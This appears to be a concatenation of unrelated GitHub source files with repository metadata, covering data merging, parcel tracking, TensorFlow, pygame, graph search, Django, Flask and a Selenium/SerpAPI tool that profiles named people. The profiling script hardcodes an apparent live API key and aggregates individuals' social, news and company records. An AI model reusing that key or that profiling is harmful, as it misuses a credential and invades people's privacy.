shopify_df.to_excel(r'D:\Projects\shopContent\shopify\shopify.xlsx', index=False, header=True, encoding="utf-8")
# rename columns name in ebay dataframe
print("Renaming columns in ebay dataframe!")
ebay_df.rename(columns={'Custom Label (SKU)': 'Variant SKU', 'C:Brand': 'Vendor',
'C:Type': 'Type', 'C:Season': 'Tags'}, inplace=True)
# exclude columns 'Vendor', 'Type', 'Tags' in shopify dataframe
print("Excluding columns in shopify dataframe!")
shopify_df = shopify_df[['Handle', 'Title', 'Body (HTML)', 'Published',
'Option1 Name', 'Option1 Value', 'Option2 Name', 'Option2 Value',
'Option3 Name', 'Option3 Value', 'Variant SKU', 'Variant Grams',
'Variant Inventory Tracker', 'Variant Inventory Qty',
'Variant Inventory Policy', 'Variant Fulfillment Service',
'Variant Price', 'Variant Compare At Price',
'Variant Requires Shipping', 'Variant Taxable', 'Variant Barcode',
'Image Src', 'Image Position', 'Image Alt Text', 'Gift Card',
'SEO Title', 'SEO Description',
'Google Shopping / Google Product Category', 'Google Shopping / Gender',
'Google Shopping / Age Group', 'Google Shopping / MPN',
'Google Shopping / AdWords Grouping',
'Google Shopping / AdWords Labels', 'Google Shopping / Condition',
'Google Shopping / Custom Product', 'Google Shopping / Custom Label 0',
'Google Shopping / Custom Label 1', 'Google Shopping / Custom Label 2',
'Google Shopping / Custom Label 3', 'Google Shopping / Custom Label 4',
'Variant Image', 'Variant Weight Unit', 'Variant Tax Code',
'Cost per item']]
# replace unnecessary characters with blank in ebay dataframe
print("Replacing unnecessary symbols in ebay dataframe!")
ebay_df['Variant SKU'] = ebay_df['Variant SKU'].str.replace("-", '')
ebay_df['Variant SKU'] = ebay_df['Variant SKU'].str.replace("A", '')
ebay_df['Variant SKU'] = ebay_df['Variant SKU'].str.replace("B", '')
ebay_df['Variant SKU'] = ebay_df['Variant SKU'].str[:6]
# replace unnecessary characters with blank in shopify dataframe
print("Replacing unnecessary symbols in shopify dataframe!")
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str.replace("-", '')
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str.replace("\'", '')
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str.replace("A", '')
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str.replace("B", '')
shopify_df['Variant SKU'] = shopify_df['Variant SKU'].str[:6]
# delete rows-duplicates in ebay dataframe
print("Deleting duplicates in ebay dataframe!")
ebay_df = ebay_df.drop_duplicates(subset=['Variant SKU'], keep='first')
# left join shopify_df to ebay_df using column 'Variant SKU'
print('Joining shopify_df and ebay_df')
join_ebay_shopify_df = pd.merge(shopify_df, ebay_df, on='Variant SKU', how='left')
# set blank value in cell where 'Variant SKU' is null
print("Setting blank value in cell where 'Variant SKU' is null")
for index, row in join_ebay_shopify_df.iterrows():
if row.isnull()['Variant SKU']:
join_ebay_shopify_df.at[index, 'Vendor'] = ''
join_ebay_shopify_df.at[index, 'Type'] = ''
join_ebay_shopify_df.at[index, 'Tags'] = ''
# export join dataframe to excel file
print("Export final dataframe to xlsx!")
join_ebay_shopify_df.to_excel(r'D:\Projects\shopContent\final.xlsx', index=False, header=True, encoding="utf-8")
# time spent for execution
end_time = time.time()
print(f"\nTime spent: {end_time-start_time}")
|
bfesiuk/shopContent
|
creating.py
|
creating.py
|
py
| 4,995 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70380481467
|
import os
import re
import sys
import json
import tempfile
import urllib.parse
import urllib.request
import http.cookiejar
import dotenv
def _read_json(url, params=None):
url = f'{url}?{urllib.parse.urlencode(params)}'
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
data = json.loads(response.read().decode('utf-8'))
return data
def main():
dotenv.load_dotenv()
args = sys.argv[1:]
CODIGO_RASTREAMENTO = os.getenv('CODIGO_RASTREAMENTO')
if len(args) > 1:
print(f'[!] Erro: Esperei 1 argumento, mas recebi {len(args)}')
exit(1)
codigo_rastreamento = None
if len(args) == 1:
codigo_rastreamento = args[0]
elif CODIGO_RASTREAMENTO is not None:
codigo_rastreamento = CODIGO_RASTREAMENTO
else:
print(f'[!] Erro: Nenhum código de rastreamento encontrado')
exit()
codigo_rastreamento = codigo_rastreamento.strip()
if not re.match(r'[A-Z]{2}[0-9]{9}BR', codigo_rastreamento):
print(f'[!] Erro: Código de rastreamento inválido ({codigo_rastreamento})')
exit(1)
# Define uma sessão HTTP
cookie_jar = http.cookiejar.CookieJar()
cookie_processor = urllib.request.HTTPCookieProcessor(cookie_jar)
opener = urllib.request.build_opener(cookie_processor)
urllib.request.install_opener(opener)
# Carrega o captcha para ser utilizado
request = urllib.request.Request('https://rastreamento.correios.com.br/core/securimage/securimage_show.php')
response = urllib.request.urlopen(request)
with tempfile.NamedTemporaryFile(suffix='.png', delete=False) as f:
f.write(response.read())
try:
os.startfile(f.name)
valor_captcha = input('[?] Digite o captcha exibido: ').strip()
finally:
os.remove(f.name)
# Utiliza o valor do captcha na requisição do primeiro resultado
data = _read_json(
'https://rastreamento.correios.com.br/app/resultado.php',
{'objeto': codigo_rastreamento, 'captcha': valor_captcha, 'mqs': 'S'},
)
if data.get('erro', 'false') == 'true':
print('[!] Erro: O captcha inserido está incorreto')
exit(1)
output_dir = os.path.join('outputs', codigo_rastreamento)
try:
os.makedirs(output_dir)
except FileExistsError:
pass
with open(os.path.join(output_dir, 'resultado.json'), 'w+', encoding='utf-8') as f:
json.dump(data, f, indent=2, ensure_ascii=False)
# Utiliza o valor do finalizador mais recente na requisição do segundo resultado
dados_eventos = data.get('eventos')
if dados_eventos:
tipo_postal = dados_eventos[0].get('finalizador')
if tipo_postal:
data = _read_json(
'https://rastreamento.correios.com.br/app/dataMaxima.php',
{'objeto': codigo_rastreamento, 'tipoPostal': tipo_postal},
)
with open(os.path.join(output_dir, 'dataMaxima.json'), 'w+', encoding='utf-8') as f:
json.dump(data, f, indent=2, ensure_ascii=False)
print('[#] Código obtido com sucesso')
main()
|
enzo-santos/publicapi-correios
|
main.py
|
main.py
|
py
| 3,135 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
16645086609
|
# !/usr/bin/python
# -*- coding: utf-8 -*-
"""
__author__ = 'qing.li'
"""
# 执行系统命令
import os
import subprocess
# print(os.system("adb devices"))
#
# # 收集结果
# print(os.popen("adb devices").readlines())
class Command:
def excute_command_result(self, cmd):
result_list = []
result = os.popen(cmd).readlines()
for i in result:
if i == '\n': continue
result_list.append(i.strip('\n'))
return result_list
def excute_command(self, cmd):
# os.system(cmd)
subprocess.Popen(cmd, shell=True, stdout=open('appium.log', 'a'), stderr=subprocess.STDOUT)
if __name__ == '__main__':
c = Command()
print(c.excute_command_result("adb devices"))
|
QingqinLi/ui_project
|
util/command.py
|
command.py
|
py
| 739 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34529796403
|
import tensorflow as tf
import numpy as np
from collections import namedtuple
from .interpolate_tf import InterpolatorTF, nonzero
InterpolatorsTuple = namedtuple(
"InterpolatorsTuple",
[
"quantiles_to_references_forward",
"quantiles_to_references_backward",
"references_to_quantiles",
"low_quantile",
"high_quantile"
])
class QuantileTransformerTF():
"""sklearn.preprocessing.QuantileTransformer that can be applied in Tensorflow
From the sklean documentation:
Transform features using quantiles information.
This method transforms the features to follow a uniform or a
normal distribution. Therefore, for a given feature, this
transformation tends to spread out the most frequent values. It
also reduces the impact of (marginal) outliers: this is therefore
a robust preprocessing scheme. The transformation is applied on
each feature independently. The cumulative density function of a
feature is used to project the original values. Features values of
new/unseen data that fall below or above the fitted range will be
mapped to the bounds of the output distribution. Note that this
transform is non-linear. It may distort linear correlations
between variables measured at the same scale but renders variables
measured at different scales more directly comparable.
"""
scope = "QuantileTransformerTF"
def in_tf_scope(function):
def res(self, *args, **kwargs):
with tf.name_scope(self.scope):
return function(self, *args, **kwargs)
return res
@in_tf_scope
def __init__(self, sklearn_transformer, sklearn_indices=None, dtype=None):
"""
Args:
sklearn_transformer: instance of fitted sklearn.preprocessing.QuantileTransformer
sklearn_indices: list of feature indices to use. E. g. if you trained
a transformer for features+outputs, here you can get separate ones. If
None, takes all the features
dtype: np.float32/np.float64, the dtype the transformer expects and outputs.
If None defaults to the sklearn_transformer.quantiles_.dtype
"""
if sklearn_transformer.output_distribution != 'normal':
raise ValueError("Only normal distribution is supported")
if dtype is None:
dtype = sklearn_transformer.quantiles_.dtype.type
self.output_distribution = tf.distributions.Normal(
dtype(0), dtype(1), name="output_distribution")
if sklearn_indices is not None:
selected_quantiles = sklearn_transformer.quantiles_[:, sklearn_indices]
else:
selected_quantiles = sklearn_transformer.quantiles_
self._quantiles = tf.constant(selected_quantiles.astype(dtype),
name="quantiles")
self._references = tf.constant(sklearn_transformer.references_.astype(dtype),
name="references")
self.n_colunms = selected_quantiles.shape[1]
self.interpolators_by_index = []
for index in range(self.n_colunms):
interpolator_quantiles_to_references_forward = InterpolatorTF().fit(
self._quantiles[:, index], self._references)
interpolator_quantiles_to_references_backward = InterpolatorTF().fit(
-self._quantiles[::-1, index], -self._references[::-1])
interpolator_references_to_quantiles = InterpolatorTF().fit(
self._references, self._quantiles[:, index])
self.interpolators_by_index.append(InterpolatorsTuple(
interpolator_quantiles_to_references_forward,
interpolator_quantiles_to_references_backward,
interpolator_references_to_quantiles,
self._quantiles[0, index],
self._quantiles[-1, index]))
self.BOUNDS_THRESHOLD = dtype(1e-7)
self.dtype = dtype
@in_tf_scope
def transform(self, data, inverse):
"""
Builds a graph for transformation
Args:
data - tf.Tensor[n_examples, n_features]
inverse - bool, whether inverse or forward transform is desired
Returns:
tf.Tensor[n_examples, n_features] - transformed data
"""
if inverse:
data = self.output_distribution.cdf(data)
per_feature_transformed = []
for i in range(self.n_colunms):
this_transformed = self._transform_col(data[:, i],
self.interpolators_by_index[i],
inverse)
this_transformed.set_shape([data.shape[0]])
per_feature_transformed.append(this_transformed)
return tf.stack(per_feature_transformed, axis=1)
def inverse_transform(self, data):
"""
Builds a graph for inverse transformation
Args:
data - tf.Tensor[n_examples, n_features]
Returns:
tf.Tensor[n_examples, n_features] - transformed data
"""
return self.transform(data, inverse=True)
@in_tf_scope
def _transform_col(self, data, interpolators, inverse):
if not inverse:
lower_bound_x = interpolators.low_quantile
upper_bound_x = interpolators.high_quantile
lower_bound_y = self.dtype(0)
upper_bound_y = self.dtype(1)
else:
lower_bound_x = self.dtype(0)
upper_bound_x = self.dtype(1)
lower_bound_y = interpolators.low_quantile
upper_bound_y = interpolators.high_quantile
lower_bounds_mask = (data - self.BOUNDS_THRESHOLD < lower_bound_x)
upper_bounds_mask = (data + self.BOUNDS_THRESHOLD > upper_bound_x)
in_range_mask = tf.logical_not(tf.logical_or(lower_bounds_mask, upper_bounds_mask))
data_in_range = tf.boolean_mask(data, in_range_mask)
if not inverse:
interpolated = 0.5*(
interpolators.quantiles_to_references_forward.interp(data_in_range) -
interpolators.quantiles_to_references_backward.interp(-data_in_range))
else:
interpolated = interpolators.references_to_quantiles.interp(data_in_range)
res = tf.dynamic_stitch(
[nonzero(upper_bounds_mask),
nonzero(in_range_mask),
nonzero(lower_bounds_mask)],
[tf.fill(tf.count_nonzero(upper_bounds_mask, keepdims=True), upper_bound_y),
interpolated,
tf.fill(tf.count_nonzero(lower_bounds_mask, keepdims=True), lower_bound_y)])
if not inverse:
res = self.output_distribution.quantile(res)
clip_min = self.output_distribution.quantile(tf.constant(
self.BOUNDS_THRESHOLD - np.spacing(1), dtype=self.dtype))
clip_max = self.output_distribution.quantile(tf.constant(
1 - (self.BOUNDS_THRESHOLD - np.spacing(1)), dtype=self.dtype))
res = tf.clip_by_value(res, clip_min, clip_max)
return res
|
yandexdataschool/QuantileTransformerTF
|
quantile_transformer_tf/quantile_transform_tf.py
|
quantile_transform_tf.py
|
py
| 7,127 |
python
|
en
|
code
| 7 |
github-code
|
6
|
1064969872
|
import pygame
from pygame.locals import *
# define constants
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
CYAN = (0, 255, 255)
VIOLET = (148, 0, 211)
width,height = 600,600
# set up display
pygame.init()
#in case you use fonts:
pygame.font.init()
myfont = pygame.font.SysFont('Consolas', 24)
scorefont = pygame.font.SysFont('Consolas', 72)
screen = pygame.display.set_mode([width,height])
pygame.display.set_caption('Pygame Window') #add your own caption!
FPS = 60 # frames per second
clock = pygame.time.Clock()
counter = 0 #frame count
# loop until user clicks the close button
done = False
while not done:
for event in pygame.event.get():
if event.type == QUIT: # if pygame window is closed by user
done = True
if event.type == KEYDOWN:
if event.key == K_SPACE:
if FPS == 60:
FPS = 300 #faster display
else:
FPS = 60
# fill the screen with background color
screen.fill(CYAN)
counter += 1
pygame.display.update()
# for saving screenshots:
# if counter %5 == 0:
# Capture(screen, 'Capture{}.png'.format(counter), (0, 0), (600, 600))
clock.tick(FPS)
pygame.quit()
|
hackingmath/pygame_sketches
|
pygame_template.py
|
pygame_template.py
|
py
| 1,334 |
python
|
en
|
code
| 4 |
github-code
|
6
|
3407354621
|
from queue import Queue
from adjacencyset import *
def distance_table(graph, start_node):
queue = Queue()
distance_table_map = {}
for v in range(graph.numVertices):
distance_table_map[v] = (None,None)
distance_table_map[start_node] = (0, None)
queue.put(start_node)
while not queue.empty():
vertex = queue.get()
vertex_distance = distance_table_map[vertex][0]
for v in graph.get_adjacent_vertices(vertex):
if distance_table_map[v][0] is None:
distance_table_map[v] = (vertex_distance + 1, vertex)
queue.put(v)
return distance_table_map
# Backtracking.. uses stack(simulated using list and always prepend)
def get_shortest_path(distance_table, source, destination):
path = [destination]
prev_vertex = distance_table[destination][1]
while prev_vertex is not None and prev_vertex is not source:
path = [prev_vertex] + path
prev_vertex = distance_table[prev_vertex][1]
if prev_vertex is None:
print("There is no path from %d to %d " % (source, destination))
else:
path = [source] + path
print(path)
a = AdjacencyGraphSet(5,True)
a.add_edge(0,1)
a.add_edge(0,2)
a.add_edge(1,3)
a.add_edge(2,4)
a.add_edge(4,1)
a.add_edge(1,3)
n = distance_table(a, 2)
print(n)
get_shortest_path(n, 2, 3)
|
VimleshS/python-graph-ds
|
shortest_path_unweighted.py
|
shortest_path_unweighted.py
|
py
| 1,361 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3357759046
|
#item应该从data中提取的
item = ['西红柿','排骨','鸡蛋','茄子','袜子','酸奶','土豆','鞋子']
import pandas as pd
import numpy as np
#header = None 属性可以将第一行数据加载到第二行,第一行就是index 1 2 3 ect.
data = pd.read_excel('tr.xlsx',header = None)
#删去I1 I2 I3第一列这些项集的编号
data = data.iloc[:,1:]
#为啥创建D呢?
D = dict()
for i in range (len(item)):
for t in range (len(item)):
z = np.zeros(len(data))
li = list()
for k in range(len(data.iloc[0,:])):
s=data.iloc[:,k]==item[t]
li.extend(list(s[s.values == True].index))
z[li]=1
D.setdefault(item[t],z)
Data = pd.DataFrame(D)
c= list(Data.columns)
c0=0.5
s0=0.2
list1 = []
list2 = []
list3 = []
for k in range(len(c)):
for q in range(len(c)):
# 对第c[k]个项与第c[q]个项挖掘关联规则,前件为c[k],后件为c[q],且要求前件和后件不相等
if c[k] != c[q]:
c1 = Data[c[k]]
c2 = Data[c[q]]
I1 = c1.values == 1
I2 = c2.values == 1
t12 = np.zeros((len(c1)))
t1 = np.zeros((len(c1)))
t12[I1 & I2] = 1
t1[I1] = 1
sp = sum(t12) / len(c1) # 支持度
co = sum(t12) / sum(t1) # 置信度
# 取置信度大于等于C0的关联规则
if co >= c0 and sp >= s0:
list1.append(c[k] + '--' + c[q])
list2.append(sp)
list3.append(co)
R = {'rule':list1,'support':list2,'confidence':list3}
R = pd.DataFrame(R)
R.to_excel('rule2.xlsx')
|
0303yk/python-
|
金融数据分析课程知识/购物搭配关联规则挖掘.py
|
购物搭配关联规则挖掘.py
|
py
| 1,625 |
python
|
en
|
code
| 0 |
github-code
|
6
|
62345004
|
from django.urls import path, include
from core import views
urlpatterns = [
path('', views.index, name='index'),
path('register/',views.register, name='register'),
path('home/',views.home, name='home'),
path('history/', views.history, name='history'),
path('generate-new-label/', views.generate_new_label, name='generate-new-label'),
path('edit-label/<int:id>/', views.edit_label, name='edit-label'),
path('delete-label/<int:id>/', views.delete_label, name='delete-label'),
path('print-label/<int:id>/', views.print_label, name='print-label'),
path('logout/', views.logout, name='logout'),
]
|
lquresh52/shipping-label-generaor
|
core/urls.py
|
urls.py
|
py
| 636 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42743009421
|
from setuptools import find_packages
from setuptools import setup
package_name = 'camera_calibration'
setup(
name=package_name,
version='1.12.23',
packages=find_packages(exclude=['test']),
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
author='James Bowman',
author_email='[email protected]',
zip_safe=True,
keywords=['ROS', 'camera_calibration'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description=(
'camera_calibration for ROS2'
),
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'cameracalibrator = camera_calibration.nodes.cameracalibrator:main',
'cameracheck = camera_calibration.nodes.cameracheck:main',
],
},
)
|
ahuizxc/ros2_camera_calibration
|
setup.py
|
setup.py
|
py
| 1,118 |
python
|
en
|
code
| 2 |
github-code
|
6
|
11623004632
|
import tkinter as tk
from tkinter import filedialog, messagebox
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import pandas as pd
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from tkinter import ttk
import requests
from bs4 import BeautifulSoup
import time
from requests.exceptions import SSLError, ConnectTimeout
class App:
def __init__(self, root):
self.root = root
self.root.geometry("300x220")
# Cadre pour le menu
self.menu_frame = tk.Frame(root, width=150, bg="grey", height=50, relief='sunken')
self.menu_frame.grid(row=0, column=0, sticky='ns')
# Boutons du menu
self.simple_search_button = tk.Button(self.menu_frame, text="Recherche Simple", command=self.show_simple_search)
self.simple_search_button.pack(fill='both')
self.identity_search_button = tk.Button(self.menu_frame, text="Recherche Identité", command=self.show_identity_search)
self.identity_search_button.pack(fill='both')
# Cadre pour le contenu
self.content_frame = tk.Frame(root)
self.content_frame.grid(row=0, column=1, sticky='nsew')
# Sous-interfaces pour chaque type de recherche
self.simple_search_interface = self.create_simple_search_interface()
self.identity_search_interface = self.create_identity_search_interface()
last_row_index = 6 # Remplacez cette valeur par l'index de la dernière ligne souhaitée.
self.progress = ttk.Progressbar(self.simple_search_interface, orient='horizontal', length=100, mode='determinate')
self.progress.grid(row=last_row_index, column=0) # Utilisez last_row_index pour positionner la barre de progression.
# Ajustement automatique de la taille des colonnes et des lignes
root.grid_columnconfigure(1, weight=1)
root.grid_rowconfigure(0, weight=1)
self.df = None
self.filename = None
self.current_row = 0
self.driver = webdriver.Chrome(service=Service(r'C:\Users\maxime.cedelle\Desktop\AISearch-2\chromedriver'))
def create_simple_search_interface(self):
frame = tk.Frame(self.content_frame)
self.upload_button = tk.Button(frame, text="Upload Excel", command=self.upload_file)
self.upload_button.grid(row=0, column=0)
self.start_button = tk.Button(frame, text="Commencer la recherche", command=self.start_search, state=tk.DISABLED)
self.start_button.grid(row=1, column=0)
self.update_button = tk.Button(frame, text="Mise à jour Excel", command=self.update_excel)
self.update_button.grid(row=2, column=0)
return frame
def create_identity_search_interface(self):
frame = tk.Frame(self.content_frame)
# Bouton pour uploader un fichier Excel
self.upload_button_identity = tk.Button(frame, text="Upload Excel", command=self.upload_file)
self.upload_button_identity.pack()
# Zone de texte pour le nom
self.name_label = tk.Label(frame, text="Nom")
self.name_label.pack()
self.name_entry = tk.Entry(frame)
self.name_entry.pack()
# Zone de texte pour le prénom
self.surname_label = tk.Label(frame, text="Prénom")
self.surname_label.pack()
self.surname_entry = tk.Entry(frame)
self.surname_entry.pack()
# Checkbox pour afficher ou cacher la zone de texte pour l'année de naissance
self.show_birth_year_check = tk.Checkbutton(frame, text="Inclure l'année de naissance", command=self.toggle_birth_year)
self.show_birth_year_check.pack()
# Zone de texte pour l'année de naissance (cachée par défaut)
self.birth_year_label = tk.Label(frame, text="Année de naissance")
self.birth_year_entry = tk.Entry(frame)
self.birth_year_entry.pack()
self.birth_year_label.pack()
self.birth_year_label.pack_forget()
self.birth_year_entry.pack_forget()
# Bouton pour lancer la recherche
self.start_identity_search_button = tk.Button(frame, text="Commencer la recherche", command=self.start_identity_search)
self.start_identity_search_button.pack()
return frame
def start_identity_search(self):
name = self.name_entry.get()
surname = self.surname_entry.get()
if name and surname:
# Effectue une recherche SerpAPI pour les données entrées
results = self.search_person(name, surname)
# Affiche les résultats dans une fenêtre contextuelle
self.show_results(results)
elif self.df is not None:
for _, row in self.df.iterrows():
name = row['nom']
surname = row['prenom']
# Effectue une recherche SerpAPI pour chaque personne
results = self.search_person(name, surname)
# Affiche les résultats dans une fenêtre contextuelle
self.show_results(results)
# Affiche une pop-up pour informer l'utilisateur que toutes les recherches sont terminées
messagebox.showinfo("Information", "Toutes les recherches sont terminées.")
else:
messagebox.showinfo("Information", "Veuillez d'abord uploader un fichier Excel ou entrer des données dans les champs de texte.")
def search_person(self, name, surname):
social_info = {"Nombre": 0, "Liens": [], "Noms": []}
digital_life = {"Nombre": 0, "Liens": [], "Noms": []}
digital_life_news = {"Nombre": 0, "Liens": [], "Noms": []} # Nouvelle catégorie pour les actualités de la vie numérique
company_info = {"Nombre": 0, "Liens": [], "Noms": []}
company_sites = ['societe.com', 'infogreffe.fr', 'b-reputation.com', 'verif.com']
params = {
"engine": "google",
"q": f"{name} {surname}",
"api_key": "9b0d4c0366546a7bd81c14d13ae3f304ea744bff2faa67fab9eed518194b7f40",
"hl": "fr",
"gl": "fr",
"google_domain": "google.com",
"location": "France"
}
for i in range(2): # limitez à 2 pages
params["start"] = i*10
try:
response = requests.get('https://serpapi.com/search', params)
data = response.json()
except Exception as e:
print(f"Erreur lors de la récupération des résultats de recherche : {e}")
continue
for result in data.get('organic_results', []):
url = result['link']
title = result.get('title', '').lower()
if name.lower() in title and surname.lower() in title:
if 'linkedin.com' in url or 'facebook.com' in url or 'twitter.com' in url or 'instagram.com' in url or 'pinterest.com' in url or 'tiktok.com' in url:
social_info["Nombre"] += 1
social_info["Liens"].append(url)
social_info["Noms"].append(name + " " + surname)
elif any(company_site in url for company_site in company_sites):
company_info["Nombre"] += 1
company_info["Liens"].append(url)
company_info["Noms"].append(name + " " + surname)
else:
digital_life["Nombre"] += 1
digital_life["Liens"].append(url)
digital_life["Noms"].append(name + " " + surname)
params["tbm"] = "nws"
params["start"] = 0
try:
response = requests.get('https://serpapi.com/search', params)
data = response.json()
except Exception as e:
print(f"Erreur lors de la récupération des résultats de recherche d'actualités : {e}")
return
for result in data.get('organic_results', []):
url = result['link']
title = result.get('title', '').lower()
if f"{name.lower()} {surname.lower()}" in title:
digital_life_news["Nombre"] += 1 # Mettez à jour la catégorie 'Vie numerique actualites'
digital_life_news["Liens"].append(url)
digital_life_news["Noms"].append(name + " " + surname)
results = {
"Reseaux sociaux": social_info,
"Vie numerique": digital_life,
"Vie numerique actualites": digital_life_news, # Ajoutez cette nouvelle catégorie aux résultats
"Entreprise": company_info
}
return results
def show_results(self, results):
# Créer une nouvelle fenêtre pour afficher les résultats de la recherche
results_window = tk.Toplevel(self.root)
results_window.title("Résultats de la recherche")
# Créer un widget texte pour afficher les nombres de résultats
results_text = tk.Text(results_window)
results_text.pack()
# Insérer les nombres de résultats dans le widget texte
for key, value in results.items():
results_text.insert(tk.END, f"{key}: {value['Nombre']}\n")
detail_button = tk.Button(results_window, text=f"Voir détails de {key}",
command=lambda value=value, key=key: self.show_details(value, key))
detail_button.pack()
results_window.geometry("300x200") # Ajuster la taille de la fenêtre
def show_details(self, value, category):
# Créer une nouvelle fenêtre pour afficher les détails
details_window = tk.Toplevel(self.root)
details_window.title(f"Détails de {category}")
if 'Liens' in value:
links_label = tk.Label(details_window, text=f"Liens:")
links_label.pack()
links_text = tk.Text(details_window)
links_text.pack()
for link in value['Liens']:
links_text.insert(tk.END, f"{link}\n")
if 'Noms' in value:
names_label = tk.Label(details_window, text=f"Noms:")
names_label.pack()
names_text = tk.Text(details_window)
names_text.pack()
for name in value['Noms']:
names_text.insert(tk.END, f"{name}\n")
width = 600
height = 100 + len(value.get('Liens', [])) * 20 + len(value.get('Noms', [])) * 20
height = min(height, 800)
details_window.geometry(f"{width}x{height}") # Définir la taille de la fenêtre
def show_simple_search(self):
self.hide_all()
self.simple_search_interface.pack()
def show_identity_search(self):
self.hide_all()
self.identity_search_interface.pack()
def hide_all(self):
self.simple_search_interface.pack_forget()
self.identity_search_interface.pack_forget()
def toggle_birth_year(self):
if self.birth_year_label.winfo_ismapped():
self.birth_year_label.pack_forget()
self.birth_year_entry.pack_forget()
else:
self.birth_year_label.pack()
self.birth_year_entry.pack()
def upload_file(self):
self.filename = filedialog.askopenfilename(initialdir = "/", title = "Sélectionner un fichier", filetypes = (("Excel files", "*.xlsx"), ("all files", "*.*")))
if self.filename:
self.df = pd.read_excel(self.filename)
self.current_row = 0
self.start_button['state'] = tk.NORMAL
def start_search(self):
if self.df is not None:
self.progress['maximum'] = len(self.df) # Configurer le maximum de la barre de progression
while self.current_row < len(self.df):
self.driver.get("https://dirigeant.societe.com/pages/recherchedir.html")
WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, "entrepdirig")))
self.driver.find_element(By.ID, "entrepdirig").send_keys(self.df.iloc[self.current_row]["nom"]) # 'nom'
WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, "entreppre")))
self.driver.find_element(By.ID, "entreppre").send_keys(self.df.iloc[self.current_row]["prenom"]) # 'prenom'
# Insérer l'année de naissance
WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, "entrepann"))) # "entrepann" est l'ID de l'élément de saisie de l'année de naissance
self.driver.find_element(By.ID, "entrepann").send_keys(self.df.iloc[self.current_row]["date_naissance"]) # 'date_naissance'
self.driver.find_element(By.XPATH, "//a[contains(text(), 'Rechercher les dirigeants')]").click()
# Attendre que les résultats soient chargés
try:
WebDriverWait(self.driver, 1).until(EC.presence_of_element_located((By.CLASS_NAME, "bloc-print")))
except TimeoutException:
print("Temps d'attente dépassé en attendant le chargement des résultats. Passage à la recherche suivante.")
try:
num_results_element = self.driver.find_element(By.CSS_SELECTOR, ".nombre.numdisplay")
num_results = int(num_results_element.text)
except NoSuchElementException:
num_results = 0
# Mettre à jour le DataFrame
self.df.at[self.current_row, "nombre de sociétés"] = num_results # 'nombre de sociétés'
# Mettre à jour la barre de progression
self.progress['value'] = self.current_row
self.progress.update()
# Passer à la prochaine recherche
self.current_row += 1
# Sauvegarder les résultats dans le fichier Excel une fois toutes les recherches terminées
self.update_excel()
# Reset de la barre de progression après la recherche
self.progress['value'] = 0
self.progress.update()
# Afficher une pop-up pour informer l'utilisateur que toutes les recherches sont terminées
messagebox.showinfo("Information", "Toutes les recherches sont terminées.")
else:
messagebox.showinfo("Information", "Veuillez d'abord uploader un fichier Excel.")
def update_excel(self):
if self.df is not None:
self.df.to_excel("Resultats.xlsx", index=False)
messagebox.showinfo("Information", "Fichier Excel mis à jour.")
root = tk.Tk()
app = App(root)
root.mainloop()
|
Boo4S/AISearch
|
main.py
|
main.py
|
py
| 15,301 |
python
|
fr
|
code
| 0 |
github-code
|
6
|
16551902324
|
import string, random, json, sys, os.path, uuid
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
# from models import sesion
# import models.models as database
from sqlalchemy.exc import IntegrityError
from sqlalchemy.sql.functions import func
from sqlalchemy import desc
import uuid
from config.config import env
from werkzeug.utils import secure_filename
from flask import flash, redirect, url_for, jsonify, render_template,send_from_directory, request
from ml_algos import PdfHandler, CommentHandler, CsvHandler
from models import tables
import datetime
import numpy as np
## Chequear que solo existe una extension
def allowed_file(file, type):
if type == 'img' and file == None:
return True
return '.' in file.filename and \
file.filename.rsplit('.', 1)[1].lower() in (env['ALLOWED_EXTENSIONS_BOOKS'] if type == 'book' else env['ALLOWED_EXTENSIONS_IMG'])
def id_generator(size=150, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def get_count(q):
count_q = q.statement.with_only_columns([func.count()]).order_by(None)
count = q.session.execute(count_q).scalar()
return count
class LibrosCtrl(object):
@staticmethod
def all(page_num):
try:
res = {
'success': False,
}
total = tables.Libro.query.filter(tables.Libro.li_activo == True)
books = tables.Libro.activeBooks(page_num)
if books == None:
res['books'] = []
else:
# print(books.comentarios)
serialized = [ { 'id': i.li_id,
'name': i.li_titulo,
'file': i.li_archivo,
# 'likes': i.likes,
'licencia': i.li_licencia,
'autor': tables.Libro.getAuthor(i.li_id),
'image': i.li_imagen } for i in books ]
res['books'] = serialized
res['success'] = True
res['total'] = get_count(total)
except Exception as e:
print(e)
# db.session.rollback()
res['msg'] = 'Hubo un error al obtener los tables.Libros, inténtelo nuevamente'
finally:
resp = jsonify(res)
return resp, 200
@staticmethod
def getBook(book_id):
try:
res = {
'success': False,
}
book = tables.Libro.exists(book_id)
if not book:
return render_template('errors/404.html'), 404
# book = tables.Libro.get_book(book_id)
book.update_num_views()
book_body = {
'id': book.li_id,
'keywords': [
{
'text': word.pc_palabra,
'weight': word.pc_ocurrencia
} for word in book.palabras_clave
],
'title': book.li_titulo,
'image': book.li_imagen,
'downloads': book.li_num_descargas,
'file': book.li_archivo,
'language': book.li_idioma,
